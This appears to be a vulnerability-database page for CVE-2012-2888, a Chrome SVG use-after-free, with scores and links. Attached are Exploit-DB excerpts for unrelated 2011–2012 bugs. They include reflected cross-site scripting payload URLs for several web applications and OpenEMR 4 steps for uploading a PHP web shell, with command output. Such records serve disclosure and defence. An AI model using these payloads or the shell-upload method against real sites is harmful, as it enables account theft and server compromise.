CVE-2012-2888
published 2012-09-26CVE-2012-2888: Use-after-free vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other…
PriorityP429high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
1.24%
66.2th percentile
Use-after-free vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving SVG text references.
Affected
55 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chrome | <= 22.0.1229.78 | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting
exploitdb·2012-11-29
CVE-2012-6312 WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting
WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/56737/info
The Video Lead Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Video Lead Form 0.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.f
Exploit-DB
Zimbra - 'view' Cross-Site Scripting
exploitdb·2012-02-13
CVE-2012-1213 Zimbra - 'view' Cross-Site Scripting
Zimbra - 'view' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51974/info
Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%
Exploit-DB
xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting
exploitdb·2012-01-26
CVE-2012-5225 xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting
xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51699/info
xClick Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
xClick Cart versions 1.0.1 and 1.0.2 are affected; other versions may also be vulnerable.
http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.
Exploit-DB
UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting
exploitdb·2012-01-04
CVE-2012-5104 UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting
UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51275/info
UBB.threads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
UBB.threads 7.5.6 is vulnerable; other versions may also be affected.
The following exploit data is available:
http://www.example.com/forums/ubbthreads.php/ubb/login/lostpw/1
POST /forums/ubbthreads.php
ubb=start_page&Loginname=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28Stri
Exploit-DB
StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2012-01-04
CVE-2012-5341 StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities
StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/51280/info
StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
StatIt 4 is vulnerable; other versions may be affected.
The following example URIs are available:
http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String
Exploit-DB
FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting
exploitdb·2012-01-02
CVE-2012-5295 FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting
FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51227/info
FuseTalk Forums is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FuseTalk Forums 3.2 is vulnerable; other versions may also be affected.
http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,8
Exploit-DB
OpenEMR 4 - Multiple Vulnerabilities
exploitdb·2011-12-25
CVE-2012-2115 OpenEMR 4 - Multiple Vulnerabilities
OpenEMR 4 - Multiple Vulnerabilities
---
OpenEMR 4 (Level @ Smash The Stack)
Summary: Patient Photograph Arbitrary File Upload
Initial Comment:
1. Login with valid User/Pass
2. Patient/Client -> Search/New Patient (search for anything)
3. Click Documents -> Patient Photograph
4. Upload Shell
URL: http://www.example.com/openemr/sites/SITENAME/documents/PATIENTID/shell.php.jpg?cmd=id
EX: http://www.example.com/oe/sites/default/documents/1/shell.php.jpg?cmd=id
Output: uid=48(apache) gid=48(apache) groups=48(apache)
first installed SITENAME = default
first installed PATIENTID = 1
OpenEMR 4 (Level @ Smash The Stack)
XSS
http://www.target.com/oe/setup.php?site=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharC
No writeups or analysis indexed.
http://googlechromereleases.blogspot.com/2012/09/stable-channel-update_25.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-10/msg00012.htmlhttps://code.google.com/p/chromium/issues/detail?id=143656https://exchange.xforce.ibmcloud.com/vulnerabilities/78829https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15612http://googlechromereleases.blogspot.com/2012/09/stable-channel-update_25.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-10/msg00012.htmlhttps://code.google.com/p/chromium/issues/detail?id=143656https://exchange.xforce.ibmcloud.com/vulnerabilities/78829https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15612
2012-09-26
Published